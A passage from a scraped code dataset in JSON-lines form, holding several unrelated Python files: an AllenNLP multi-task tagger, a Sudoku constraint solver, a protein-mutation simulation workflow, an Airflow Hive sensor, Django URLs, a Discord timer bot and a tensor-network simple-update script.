output_dict[\"tags\"]]\n return output_dict\n\n @overrides\n def decode(self, output_dict: Dict[str, torch.Tensor]) -> Dict[str, torch.Tensor]:\n \"\"\"\n Converts the tag ids to the actual tags.\n ``output_dict[\"tags\"]`` is a list of lists of tag_ids,\n so we use an ugly nested list comprehension.\n \"\"\"\n task_output_dicts = {}\n for tsk in self.tasks:\n tmp_output_dict = output_dict.copy()\n task_output_dicts[tsk + '_labels'] = self.task_decode(tsk, tmp_output_dict)\n all_predicted_tokens = []\n for b, task_namespace in enumerate(output_dict['label_namespaces']):\n all_predicted_tokens.append(task_output_dicts[task_namespace]['tags'][b])\n output_dict['tags'] = all_predicted_tokens\n return output_dict\n\n @overrides\n def get_metrics(self, reset: bool = False) -> Dict[str, float]:\n # task_accs = {}\n task_f1s = {}\n for tsk in self.tasks:\n # for metric_name, metric in self.metrics[tsk].items():\n # task_accs[tsk + '-' + metric_name] = metric.get_metric(reset)\n metric_dict = self.span_metric[tsk].get_metric(reset=reset)\n for x, y in metric_dict.items():\n # if \"overall\" in x:\n if \"f1-measure-overall\" in x:\n task_f1s[tsk + '-' + x] = y\n # avg_accs = {}\n avg_f1s = {}\n # for metric_name, _ in self.metrics[self.tasks[0]].items():\n # total_acc = []\n # for tsk in self.tasks:\n # total_acc.append(task_accs[tsk + '-' + metric_name])\n # avg_accs[metric_name] = sum(total_acc) / len(total_acc)\n for x, _ in self.span_metric[self.tasks[0]].get_metric(reset=reset).items():\n # if \"overall\" in x:\n if \"f1-measure-overall\" in x:\n total_f1 = []\n for tsk in self.tasks:\n total_f1.append(task_f1s[tsk + '-' + x])\n avg_f1s[x] = sum(total_f1) / len(total_f1)\n # return {**avg_f1s, ** avg_accs, **task_f1s, **task_accs, }\n return {**avg_f1s, **task_f1s}\n\n @classmethod\n def from_params(cls, vocab: Vocabulary, params: Params) -> 'MultiTagger':\n tasks = params.pop(\"tasks\")\n domains = params.pop(\"domains\")\n embedder_params = params.pop(\"text_field_embedder\")\n text_field_embedder = TextFieldEmbedder.from_params(vocab, embedder_params)\n stacked_encoder = Seq2SeqEncoder.from_params(params.pop(\"stacked_encoder\"))\n source_namespace = params.pop(\"source_namespace\", \"tokens\")\n label_suffix_namespace = params.pop(\"label_suffix_namespace\", \"labels\")\n is_crf = params.pop(\"is_crf\", False)\n # device = params.pop(\"device\", -1)\n initializer = InitializerApplicator.from_params(params.pop('initializer', []))\n regularizer = RegularizerApplicator.from_params(params.pop('regularizer', []))\n return cls(vocab=vocab,\n tasks=tasks,\n domains=domains,\n text_field_embedder=text_field_embedder,\n stacked_encoder=stacked_encoder,\n source_namespace=source_namespace,\n label_suffix_namespace=label_suffix_namespace,\n is_crf=is_crf,\n initializer=initializer,\n regularizer=regularizer)\n","sub_path":"allennlp/models/multi_tagger.py","file_name":"multi_tagger.py","file_ext":"py","file_size_in_byte":16667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"24677817","text":"import sys\nimport copy\nimport random\nimport itertools\nimport argparse\n\nbacktrack_call_num = 0\nbacktrack_fail_num = 0\n\nclass CSP:\n def __init__(self):\n # self.variables is a list of the variable names in the CSP\n self.variables = []\n\n # self.domains[i] is a list of legal values for variable i\n self.domains = {}\n\n # self.constraints[i][j] is a list of legal value pairs for\n # the variable pair (i, j)\n self.constraints = {}\n\n def add_variable(self, name, domain):\n \"\"\"Add a new variable to the CSP. 'name' is the variable name\n and 'domain' is a list of the legal values for the variable.\n \"\"\"\n self.variables.append(name)\n self.domains[name] = list(domain)\n self.constraints[name] = {}\n\n def get_all_possible_pairs(self, a, b):\n \"\"\"Get a list of all possible pairs (as tuples) of the values in\n the lists 'a' and 'b', where the first component comes from list\n 'a' and the second component comes from list 'b'.\n \"\"\"\n return itertools.product(a, b)\n\n def get_all_arcs(self):\n \"\"\"Get a list of all arcs/constraints that have been defined in\n the CSP. The arcs/constraints are represented as tuples (i, j),\n indicating a constraint between variable 'i' and 'j'.\n \"\"\"\n return [(i, j) for i in self.constraints for j in self.constraints[i]]\n\n def get_all_neighboring_arcs(self, var):\n \"\"\"Get a list of all arcs/constraints going to/from variable\n 'var'. The arcs/constraints are represented as in get_all_arcs().\n \"\"\"\n return [(i, var) for i in self.constraints[var]]\n\n def add_constraint_one_way(self, i, j, filter_function):\n \"\"\"Add a new constraint between variables 'i' and 'j'. The legal\n values are specified by supplying a function 'filter_function',\n that returns True for legal value pairs and False for illegal\n value pairs. This function only adds the constraint one way,\n from i -> j. You must ensure that the function also gets called\n to add the constraint the other way, j -> i, as all constraints\n are supposed to be two-way connections!\n \"\"\"\n if not j in self.constraints[i]:\n # First, get a list of all possible pairs of values between variables i and j\n self.constraints[i][j] = self.get_all_possible_pairs(self.domains[i], self.domains[j])\n\n # Next, filter this list of value pairs through the function\n # 'filter_function', so that only the legal value pairs remain\n self.constraints[i][j] = filter(lambda value_pair: filter_function(*value_pair), self.constraints[i][j])\n\n def add_all_different_constraint(self, variables):\n \"\"\"Add an Alldiff constraint between all of the variables in the\n list 'variables'.\n \"\"\"\n for (i, j) in self.get_all_possible_pairs(variables, variables):\n if i != j:\n self.add_constraint_one_way(i, j, lambda x, y: x != y)\n\n def backtracking_search(self):\n \"\"\"This functions starts the CSP solver and returns the found\n solution.\n \"\"\"\n # Make a so-called \"deep copy\" of the dictionary containing the\n # domains of the CSP variables. The deep copy is required to\n # ensure that any changes made to 'assignment' does not have any\n # side effects elsewhere.\n assignment = copy.deepcopy(self.domains)\n # Run AC-3 on all constraints in the CSP, to weed out all of the\n # values that are not arc-consistent to begin with\n self.inference(assignment, self.get_all_arcs())\n\n # Call backtrack with the partial assignment 'assignment'\n return self.backtrack(assignment)\n\n def backtrack(self, assignment):\n \"\"\"The function 'Backtrack' from the pseudocode in the\n textbook.\n\n The function is called recursively, with a partial assignment of\n values 'assignment'. 'assignment' is a dictionary that contains\n a list of all legal values for the variables that have *not* yet\n been decided, and a list of only a single value for the\n variables that *have* been decided.\n\n When all of the variables in 'assignment' have lists of length\n one, i.e. when all variables have been assigned a value, the\n function should return 'assignment'. Otherwise, the search\n should continue. When the function 'inference' is called to run\n the AC-3 algorithm, the lists of legal values in 'assignment'\n should get reduced as AC-3 discovers illegal values.\n\n IMPORTANT: For every iteration of the for-loop in the\n pseudocode, you need to make a deep copy of 'assignment' into a\n new variable before changing it. Every iteration of the for-loop\n should have a clean slate and not see any traces of the old\n assignments and inferences that took place in previous\n iterations of the loop.\n \"\"\"\n global backtrack_call_num, backtrack_fail_num #global variables that keep track of the number of calls and failures\n backtrack_call_num = backtrack_call_num + 1\n\n if all(len(assignment[items]) == 1 for items in assignment):\n print('Ending reached.')\n return assignment\n \n var = self.select_unassigned_variable(assignment)\n for value in assignment[var]:\n new_assignment = copy.deepcopy(assignment)\n new_assignment[var] = value\n if self.inference(new_assignment, self.get_all_arcs()):\n solution = self.backtrack(new_assignment)\n if solution:\n return solution\n backtrack_fail_num = backtrack_fail_num + 1\n return 0\n\n def select_unassigned_variable(self, assignment):\n \"\"\"The function 'Select-Unassigned-Variable' from the pseudocode\n in the textbook. Should return the name of one of the variables\n in 'assignment' that have not yet been decided, i.e. whose list\n of legal values has a length greater than one.\n \"\"\"\n undecided_var = random.choice(list(assignment)) #just initialize this to something, any random grid area seems to work fine\n for item in assignment:\n if len(assignment[item]) > 1:\n undecided_var = item\n return undecided_var\n\n def inference(self, assignment, queue):\n \"\"\"The function 'AC-3' from the pseudocode in the textbook.\n 'assignment' is the current partial assignment, that contains\n the lists of legal values for each undecided variable. 'queue'\n is the initial queue of arcs that should be visited.\n \"\"\"\n first_values = ()\n while queue:\n first_values = queue[0]\n del queue[0]\n if(self.revise(assignment, first_values[0], first_values[1])):\n if len(assignment[first_values[0]]) == 0:\n return False\n for k in self.get_all_neighboring_arcs(first_values[0]):\n queue.append(k)\n return True\n\n def revise(self, assignment, i, j):\n \"\"\"The function 'Revise' from the pseudocode in the textbook.\n 'assignment' is the current partial assignment, that contains\n the lists of legal values for each undecided variable. 'i' and\n 'j' specifies the arc that should be visited. If a value is\n found in variable i's domain that doesn't satisfy the constraint\n between i and j, the value should be deleted from i's list of\n legal values in 'assignment'.\n \"\"\"\n revised = False\n for x in assignment[i]:\n valid_y = False\n for y in assignment[j]:\n for constraint in self.constraints[i][j]:\n #if a valid constraint exists set valid_y to True so nothing needs to be removed\n if (x, y) == constraint:\n valid_y = True\n if not valid_y:\n if x in assignment[i]:\n ## had to do this check or things exploded. some values were strings instead of lists so i convert them cause i dont wanna handle strings separately\n if isinstance(assignment[i], str):\n assignment[i] = [assignment[i]]\n assignment[i].remove(x)\n revised = True\n return revised\n\ndef create_sudoku_csp(filename):\n \"\"\"Instantiate a CSP representing the Sudoku board found in the text\n file named 'filename' in the current directory.\n \"\"\"\n csp = CSP()\n board = list(map(lambda x: x.strip(), open(filename, 'r')))\n\n for row in range(9):\n for col in range(9):\n if board[row][col] == '0':\n csp.add_variable('%d-%d' % (row, col), list(map(str, range(1, 10))))\n else:\n csp.add_variable('%d-%d' % (row, col), [board[row][col]])\n\n for row in range(9):\n csp.add_all_different_constraint(['%d-%d' % (row, col) for col in range(9)])\n for col in range(9):\n csp.add_all_different_constraint(['%d-%d' % (row, col) for row in range(9)])\n for box_row in range(3):\n for box_col in range(3):\n cells = []\n for row in range(box_row * 3, (box_row + 1) * 3):\n for col in range(box_col * 3, (box_col + 1) * 3):\n cells.append('%d-%d' % (row, col))\n csp.add_all_different_constraint(cells)\n\n for constraint in csp.constraints:\n for entry in csp.constraints[constraint]:\n csp.constraints[constraint][entry] = list(csp.constraints[constraint][entry])\n return csp\n\n\ndef print_sudoku_solution(solution):\n \"\"\"Convert the representation of a Sudoku solution as returned from\n the method CSP.backtracking_search(), into a human readable\n representation.\n \"\"\"\n for row in range(9):\n for col in range(9):\n print(solution['%d-%d' % (row, col)][0], end=\" \"),\n if col == 2 or col == 5:\n print('|', end=\" \"),\n print(\"\")\n if row == 2 or row == 5:\n print('------+-------+------')\n\nif __name__==\"__main__\":\n sudoku_boards = ['easy.txt', 'medium.txt', 'hard.txt', 'veryhard.txt']\n for board in sudoku_boards:\n backtrack_call_num = 0\n backtrack_fail_num = 0\n print('-----------------------')\n print('Doing', board, 'board')\n sudoku = create_sudoku_csp(board)\n result = sudoku.backtracking_search()\n print_sudoku_solution(result)\n print('Backtrack called ', backtrack_call_num, ' times.')\n print('Backtrack failed ', backtrack_fail_num, ' times.')\n print('-----------------------')\n","sub_path":"Assignment.py","file_name":"Assignment.py","file_ext":"py","file_size_in_byte":10762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"609698778","text":"import sys\nimport os\nimport glob\nimport datetime\nimport numpy as np\nfrom Class_PDB import *\nfrom Class_Conf import *\nfrom Class_ONIOM_Frame import *\nfrom helper import write_data, line_feed\n\n# settings\nConfig.n_cores = 16\nConfig.max_core = 2000\nConfig.PC_cmd = 'srun'\nConfig.Amber.conf_equi['nstlim'] = 50000\nConfig.Amber.conf_prod['nstlim'] = 500000\nConfig.debug = 1\ndata_output_path = './Mutation-E-BD.dat'\nwkflow_log_path = './FAcD-Gen.py.log'\n\ndef main():\n\tstarttime = datetime.datetime.now()\n\n\tof = open(wkflow_log_path, 'wb', buffering=0)\n\tfor i in range(25):\n\t\tof.write(('Round: '+str(i)+line_feed).encode('utf-8'))\t\t\t\t\t\t\t\t\t\t\t\t# Remove water and ion in original crystal file \t\t\t\t\t\t\t\t\t\t\t(self.path) \n\t\t# --- Preparation ---\n\t\tpdb_obj = PDB('./FAcD-FA-ASP.pdb', wk_dir='./FAcD_test'+str(i))\t\t# Initiate with the file from protein data bank \t\t\t\t\t\t\t\t\t\t\t(self.path) \n\t\tpdb_obj.rm_wat()\n\t\tof.write(('Preparation: '+str(datetime.datetime.now()- starttime)+line_feed).encode('utf-8'))\t\t\t\t\t\t\t\t\t\t\t\t\t# Remove water and ion in original crystal file \t\t\t\t\t\t\t\t\t\t\t(self.path) \n\t\t# pdb_obj.get_protonation()\t\t\t\t\t\t\t\t\t\t\t# For most crystal files, add hydrogens\t\t\t\t\t\t\t\t\t\t\t\t\t\t(self.path) \n\n\t\t# --- Operation ---\n\t\t# Mutation\n\t\tMuta_tag = pdb_obj.Add_MutaFlag('r')\t\t\t\t\t\t\t\t# Generate a target \"Flag\" for mutation \t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\tif pdb_obj.MutaFlags[0][2] == '108': \t\t\t\t\t\t\t\t# Keep the key residue \n\t\t\tcontinue\n\t\tpdb_obj.PDB2PDBwLeap()\t\t\t\t\t\t\t\t\t\t\t\t# Deploy mutation \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t(self.path) \n\t\tof.write(('Mutation: p2pwl: '+str(datetime.datetime.now()- starttime)+line_feed).encode('utf-8'))\t\t\t\t\t\t\t\t\t\t\t\t\t# Remove water and ion in original crystal file \t\t\t\t\t\t\t\t\t\t\t(self.path) \n\t\t# protonation modification\n\t\tpdb_obj.rm_allH()\t\t\t\t\t\t\t\t\t\t\t\t\t# Remove all hydrogens after mutation (residues only) \t\t\t\t\t\t\t\t\t\t(self.path) \n\t\tpdb_obj.get_protonation()\t\t\t\t\t\t\t\t\t\t\t# Determine protonation state again \t\t\t\t\t\t\t\t\t\t\t\t\t\t(self.path) \n\t\t# use minimization to relax each mutated PDB\n\t\tpdb_obj.PDB2FF(local_lig=0)\t\t\t\t\t\t\t\t\t\t\t\t\t# Generate parameter files for MD simulation \n\t\texit_code = pdb_obj.PDBMin(engine='Amber_pmemd_gpu')\t\t\t\t# Minimization \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t(self.path) \n\t\tif exit_code == 1:\n\t\t\tcontinue\n\t\tof.write(('Mutation: PDBMin: '+str(datetime.datetime.now()- starttime)+line_feed).encode('utf-8'))\t\t\t\t\t\t\t\t\t\t\t# Remove water and ion in original crystal file \t\t\t\t\t\t\t\t\t\t\t(self.path) \n\n\t\t# --- Sample with MD ---\n\t\tpdb_obj.rm_wat()\t\t\t\t\t\t\t\t\t\t\t\t\t# Remove water from the minimization \t\t\t\t\t\t\t\t\t\t\t\t\t\t(self.path) \t\t\t\t\t\t\t\t\t\t\t\t\n\t\tpdb_obj.PDB2FF(local_lig=0, ifsavepdb=1) \t\t\t\t\t\t\t\t\t\t# Generate parameter files *savepdb save the exact structure use in MD for future analysis \t(self.path) \n\t\tpdb_obj.PDBMD(tag=Muta_tag, engine='Amber_pmemd_gpu', equi_cpu=1)\t\t\t\t# Run MD \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t(self.nc) \n\t\tof.write(('MD: '+str(datetime.datetime.now()- starttime)+line_feed).encode('utf-8'))\t\t\t\t\t\t\t\t\t\t\t\t\t# Remove water and ion in original crystal file \t\t\t\t\t\t\t\t\t\t\t(self.path) \n\t\t# sample\n\t\tpdb_obj.nc2mdcrd(point=100)\t\t\t\t\t\t\t\t\t\t\t# Sample from trajactory \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t(self.mdcrd) \n\n\t\t# --- QM cluster ---\n\t\tatom_mask = ':108,298'\t\t\t\t\t\t\t\t\t\t\t\t# Define QM cluster / can also use some presets: ligand; residues within a distance using a Layer object\n\t\tg_route = '# hf/6-31G(d) pop=cm5 nosymm'\t\t\t\t\t\t\t# QM keywords\n\t\tpdb_obj.PDB2QMCluster(atom_mask, g_route=g_route, ifchk=1)\t\t\t# Run QM cluster calculation\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t(self.qm_cluster_out, self.qm_cluster_chk) \n\t\tof.write(('QM Cluster: '+str(datetime.datetime.now()- starttime)+line_feed).encode('utf-8'))\t\t\t\t\t\t\t\t\t\t\t\t\t# Remove water and ion in original crystal file \t\t\t\t\t\t\t\t\t\t\t(self.path) \n\t\tpdb_obj.get_fchk(keep_chk=0)\t\t\t\t\t\t\t\t\t\t# Save fchk files for analysis\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t(self.qm_cluster_fchk) \n\t\t\n\t\t# --- Analysis ---\n\t\t# targeting C-F bond\n\t\ta1 = int(pdb_obj.stru.ligands[0].CH3)\n\t\ta2 = int(pdb_obj.stru.ligands[0].F)\n\t\ta1qm = pdb_obj.qm_cluster_map[str(a1)]\n\t\ta2qm = pdb_obj.qm_cluster_map[str(a2)]\n\t\t# Field Strength (MM)\n\t\tE_atom_mask = ':1-107,109-297'\t\t\t\t\t\t\t\t\t\t# Define atoms for field strength calculation\n\t\tEs = pdb_obj.get_field_strength(E_atom_mask, a1=a1 ,a2=a2 ,bond_p1='center') # Run Field Strength analysis\n\t\tof.write(('Get field strength: '+str(datetime.datetime.now()- starttime)+line_feed).encode('utf-8'))\t\t\t\t\t\t\t\t\t\t\t\t\t# Remove water and ion in original crystal file \t\t\t\t\t\t\t\t\t\t\t(self.path) \n\t\t# Bond Dipole Moment (QM)\n\t\tDipoles = PDB.get_bond_dipole(pdb_obj.qm_cluster_fchk, a1qm, a2qm)\t# Run Bond Dipole Moment analysis\n\t\tof.write(('Get bond dipole: '+str(datetime.datetime.now()- starttime)+line_feed).encode('utf-8'))\t\t\t\t\t\t\t\t\t\t\t\t\t# Remove water and ion in original crystal file \t\t\t\t\t\t\t\t\t\t\t(self.path) \n\t\t# Mutation distance\n\t\tr1 = pdb_obj.stru.ligands[0]\n\t\tr2 = pdb_obj.stru.chains[ord(pdb_obj.MutaFlags[0][1])-65][int(pdb_obj.MutaFlags[0][2])-1]\n\t\tDist = pdb_obj.stru.get_resi_dist(r1, r2)\n\n\t\t# write to csv or plot\t\t\t\t\t\t\t\t\t\t\t\t\n\t\twrite_data(pdb_obj.MutaFlags, {'E': Es, 'Bond Dipole': Dipoles, 'Distance': Dist}, data_output_path)\t\t# Current data: Mutation - MD geometry - QM cluster wavefunction = Field strength at bond - Bond dipole moment\n\t\tof.write((Muta_tag+ ' finish: '+str(datetime.datetime.now()- starttime)+line_feed).encode('utf-8'))\t\t\t\t\t\t\t\t\t\t\t\t\t# Remove water and ion in original crystal file \t\t\t\t\t\t\t\t\t\t\t(self.path) \n\t\t\t\n\tendtime = datetime.datetime.now()\n\tprint(endtime - starttime)\n\tof.close()\n\n\n\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"Test_file/FAcD_expanse/FAcD-Gen-fixlog.py","file_name":"FAcD-Gen-fixlog.py","file_ext":"py","file_size_in_byte":5386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"379259972","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.7-x86_64/egg/airflow/sensors/hive_partition_sensor.py\n# Compiled at: 2019-09-11 03:47:34\n# Size of source mod 2**32: 3069 bytes\nfrom airflow.sensors.base_sensor_operator import BaseSensorOperator\nfrom airflow.utils.decorators import apply_defaults\n\nclass HivePartitionSensor(BaseSensorOperator):\n __doc__ = '\\n Waits for a partition to show up in Hive.\\n\\n Note: Because ``partition`` supports general logical operators, it\\n can be inefficient. Consider using NamedHivePartitionSensor instead if\\n you don\\'t need the full flexibility of HivePartitionSensor.\\n\\n :param table: The name of the table to wait for, supports the dot\\n notation (my_database.my_table)\\n :type table: str\\n :param partition: The partition clause to wait for. This is passed as\\n is to the metastore Thrift client ``get_partitions_by_filter`` method,\\n and apparently supports SQL like notation as in ``ds=\\'2015-01-01\\'\\n AND type=\\'value\\'`` and comparison operators as in ``\"ds>=2015-01-01\"``\\n :type partition: str\\n :param metastore_conn_id: reference to the metastore thrift service\\n connection id\\n :type metastore_conn_id: str\\n '\n template_fields = ('schema', 'table', 'partition')\n ui_color = '#C5CAE9'\n\n @apply_defaults\n def __init__(self, table, partition=\"ds='{{ ds }}'\", metastore_conn_id='metastore_default', schema='default', poke_interval=180, *args, **kwargs):\n (super(HivePartitionSensor, self).__init__)(args, poke_interval=poke_interval, **kwargs)\n if not partition:\n partition = \"ds='{{ ds }}'\"\n self.metastore_conn_id = metastore_conn_id\n self.table = table\n self.partition = partition\n self.schema = schema\n\n def poke(self, context):\n if '.' in self.table:\n self.schema, self.table = self.table.split('.')\n self.log.info('Poking for table %s.%s, partition %s', self.schema, self.table, self.partition)\n if not hasattr(self, 'hook'):\n from airflow.hooks.hive_hooks import HiveMetastoreHook\n self.hook = HiveMetastoreHook(metastore_conn_id=(self.metastore_conn_id))\n return self.hook.check_for_partition(self.schema, self.table, self.partition)","sub_path":"pycfiles/apache_airflow_arup-1.10.5-py3.6/hive_partition_sensor.cpython-36.py","file_name":"hive_partition_sensor.cpython-36.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"57904807","text":"# -*- coding: utf-8 -*-\n\nfrom django.conf.urls import patterns, include, url\n# from django.contrib import admin\n# from django.conf import settings\nfrom books.views import MainPageView\n\n\nurlpatterns = patterns('',\n url(r'^$', MainPageView.as_view(),\n name=\"index\"),\n\n url(r'^api-v1/', include('api_v1.urls',\n namespace='api_v1')),\n )\n","sub_path":"alytics_test/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"230932037","text":"import discord\nfrom discord.ext import commands\nimport asyncio\n\n\nclass Ailurophile(commands.Cog, name=\"Ailurophile\"):\n def __init__(self, bot):\n self.client = bot\n\n @commands.Cog.listener()\n async def on_ready(self):\n print(\"Готов быть таймером\")\n\n @commands.Cog.listener()\n async def on_message(self, message):\n if isinstance(message.channel, discord.DMChannel) and not message.author.bot:\n text = message.content\n if text.startswith(\"set_timer in\"):\n text = text.split()[2:]\n\n if not all((text[0].isdigit(), text[1] == \"hours\", text[2] == \"and\", text[3].isdigit(), text[4] == \"minutes.\")):\n return\n\n hours, minutes = float(text[0]), float(text[3])\n if hours == int(hours):\n hours = int(hours)\n if minutes == int(minutes):\n minutes = int(minutes)\n\n seconds = 60 ** 2 * hours + 60 * minutes\n await message.channel.send(f\"The time should start in {hours} hours {minutes} minutes\")\n await asyncio.sleep(seconds)\n await message.channel.send(\"Time X has come!\")\n\n\ndef setup(bot):\n bot.add_cog(Ailurophile(bot))\n","sub_path":"discord/Timer_bot/cogs/timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"377237998","text":"import numpy as np\nimport random\nimport time\nimport matplotlib.pyplot as plt\nimport copy as cp\nimport pickle\nimport pandas as pd\n\nimport RandomPEPS as rpeps\nimport StructureMatrixGenerator as smg\nimport trivialSimpleUpdate as tsu\nimport DoubleEdgeFactorGraphs as defg\nimport SimpleUpdate as su\nimport bmpslib as bmps\n\n\n########################################################################################################################\n# #\n# TRIVIAL SIMPLE UPDATE (TSU) ON RANDOM PEPS #\n# #\n########################################################################################################################\nnp.random.seed(1)\n\n# tSU parameters\nN, M = 4, 4\nbc = 'open'\ndw = 1e-10\nD_max = 2\nt_max = 100\nepsilon = 1e-5\ndumping = 0.2\niterations = 30\nd = 2\nsmat, _ = smg.finitePEPSobcStructureMatrixGenerator(N, M)\ntensors_tsu, weights_tsu = smg.randomTensornetGenerator(smat, d, D_max)\ntensors_su, weights_su = cp.deepcopy(tensors_tsu), cp.deepcopy(weights_tsu)\nn, m = smat.shape\n\n\ndef getBMPOedgeList(N, M, smat):\n TN = np.arange(N * M).reshape(N, M)\n Hpairs = []\n Vpairs = []\n HedgeList = []\n VedgeList = []\n for i in range(N):\n for j in range(M - 1):\n tH1 = TN[i][j]\n tH2 = TN[i][j + 1]\n Hpairs.append([tH1, tH2])\n\n for i in range(N - 1):\n for j in range(M):\n tV1 = TN[i][j]\n tV2 = TN[i + 1][j]\n Vpairs.append([tV1, tV2])\n\n for i, pair in enumerate(Hpairs):\n for k in range(m):\n if smat[pair[0], k] and smat[pair[1], k]:\n HedgeList.append(k)\n break\n for i, pair in enumerate(Vpairs):\n for k in range(m):\n if smat[pair[0], k] and smat[pair[1], k]:\n VedgeList.append(k)\n break\n\n return HedgeList + VedgeList\n\n\n\n# SU parameters\nZ = np.array([[1, 0], [0, -1]])\nY = np.array([[0, -1j], [1j, 0]])\nX = np.array([[0, 1], [1, 0]])\nSz = 0.5 * Z\nSy = 0.5 * Y\nSx = 0.5 * X\nOpi = [Sx, Sy, Sz]\nOpj = [Sx, Sy, Sz]\nOp_field = np.eye(d)\ntimeStep = 0.00\ninteractionConstants = [-1] * m\ndE = 1e-5\n\nerrors_tsu = []\nerrors_su = []\n\n'''\nfor i in range(iterations):\n tensors_tsu_next, weights_tsu_next = tsu.trivialsimpleUpdate(tensors_tsu, weights_tsu, smat, D_max)\n error = np.sum(np.abs(np.asarray(weights_tsu) - np.asarray(weights_tsu_next)))\n errors_tsu.append(error)\n if error < dw:\n print('The error is: {}'.format(error))\n tensors_tsu = tensors_tsu_next\n weights_tsu = weights_tsu_next\n break\n tensors_tsu = tensors_tsu_next\n weights_tsu = weights_tsu_next\n'''\n# constructing the dual double-edge factor graph\npre_graph = defg.defg()\npre_graph = su.TNtoDEFGtransform(pre_graph, tensors_su, weights_su, smat)\ns = time.time()\npre_graph.sumProduct(t_max, epsilon, dumping, printTime=1, RDMconvergence=0)\npre_tot = time.time() - s\npre_graph.calculateFactorsBeliefs()\n\n\n\nfor i in range(iterations):\n tensors_su_next, weights_su_next = su.simpleUpdate(tensors_su,\n weights_su,\n timeStep,\n interactionConstants,\n 0,\n Opi,\n Opj,\n Op_field,\n smat,\n D_max,\n 'SU',\n graph=None)\n\n error = np.sum(np.abs(np.asarray(weights_su) - np.asarray(weights_su_next)))\n errors_su.append(error)\n if error < dw:\n print('The error is: {}'.format(error))\n tensors_su = tensors_su_next\n weights_su = weights_su_next\n break\n tensors_su = tensors_su_next\n weights_su = weights_su_next\n\n# constructing the dual double-edge factor graph\npost_graph = defg.defg()\npost_graph = su.TNtoDEFGtransform(post_graph, tensors_su, weights_su, smat)\ns = time.time()\npost_graph.sumProduct(t_max, epsilon, dumping, printTime=1, RDMconvergence=0)\npost_tot = time.time() - s\npost_graph.calculateFactorsBeliefs()\n\nrho_SU = []\n# RDMS using BP and SU\nfor i in range(n):\n rho_SU.append(su.singleSiteRDM(i, tensors_su, weights_su, smat))\nrho_pre_graph = pre_graph.calculateRDMSfromFactorBeliefs()\nrho_post_graph = pre_graph.calculateRDMSfromFactorBeliefs()\n\n\nd_pre_post = 0\nd_pre_su = 0\nd_post_su = 0\nfor i in range(n):\n d_pre_post += su.traceDistance(rho_pre_graph[i], rho_pre_graph[i])\n d_pre_su += su.traceDistance(rho_pre_graph[i], rho_SU[i])\n d_post_su += su.traceDistance(rho_post_graph[i], rho_SU[i])\n\nprint('\\nd(pre, post) = {}\\nd(pre, su) = {}\\nd(post, su) = {}'.format(d_pre_post / n, d_pre_su / n, d_post_su / n))\n\nfor _ in range(1):\n tensors_su_next, weights_su_next = su.simpleUpdate(tensors_su,\n weights_su,\n 0.1,\n interactionConstants,\n 0,\n Opi,\n Opj,\n Op_field,\n smat,\n D_max,\n 'SU',\n graph=None)\n tensors_su = tensors_su_next\n weights_su = weights_su_next\n\nrho_next_SU = []\n# RDMS using BP and SU\nfor i in range(n):\n rho_next_SU.append(su.singleSiteRDM(i, tensors_su, weights_su, smat))\nd_post_su_next = 0\nfor i in range(n):\n d_post_su_next += su.traceDistance(rho_post_graph[i], rho_next_SU[i])\n\nprint('d(post, su-next) = {}'.format(d_post_su_next))\n\n\n\n\n\nfor i in range(iterations):\n tensors_su_next, weights_su_next = su.simpleUpdate(tensors_su,\n weights_su,\n timeStep,\n interactionConstants,\n 0,\n Opi,\n Opj,\n Op_field,\n smat,\n D_max,\n 'SU',\n graph=None)\n\n error = np.sum(np.abs(np.asarray(weights_su) - np.asarray(weights_su_next)))\n errors_su.append(error)\n if error < dw:\n print('The error is: {}'.format(error))\n tensors_su = tensors_su_next\n weights_su = weights_su_next\n break\n tensors_su = tensors_su_next\n weights_su = weights_su_next\n\n#plt.figure()\n#plt.plot(range(len(errors_tsu)), errors_tsu)\n#plt.plot(range(len(errors_su)), errors_su)\n#plt.legend(['tSU', 'SU'])\n#plt.show()\n\n\n# RDMS using BMPO from bmpslib\n\ntensors_su_p = su.absorbAllTensorNetWeights(tensors_su, weights_su, smat)\ntensors_su_p = smg.PEPS_OBC_broadcast_to_Itai(tensors_su_p, [N, M], d, D_max)\npeps = bmps.peps(N, M)\nfor t, T in enumerate(tensors_su_p):\n i, j = np.unravel_index(t, [N, M])\n peps.set_site(T, i, j)\nBMPO_RDMS = bmps.calculate_PEPS_2RDM(peps, int(2 * (D_max ** 2)))\nfor i in range(len(BMPO_RDMS)):\n BMPO_RDMS[i] = np.reshape(BMPO_RDMS[i], (d * d, d * d))\n","sub_path":"Runs/main_tSU_fixedPoint.py","file_name":"main_tSU_fixedPoint.py","file_ext":"py","file_size_in_byte":8176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"597053055","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jan 3 17:38:08 2020\r\n\r\n@author: dhamuk\r\n\"\"\"\r\n\r\nfrom numpy import array\r\nfrom pickle import load\r\nfrom keras.preprocessing.text import Tokenizer\r\nfrom keras.preprocessing.sequence import pad_sequences\r\nfrom keras.utils import to_categorical\r\n\r\n\r\n###constants for sentence start and end\r\nSTART=' '\r\nEND=' 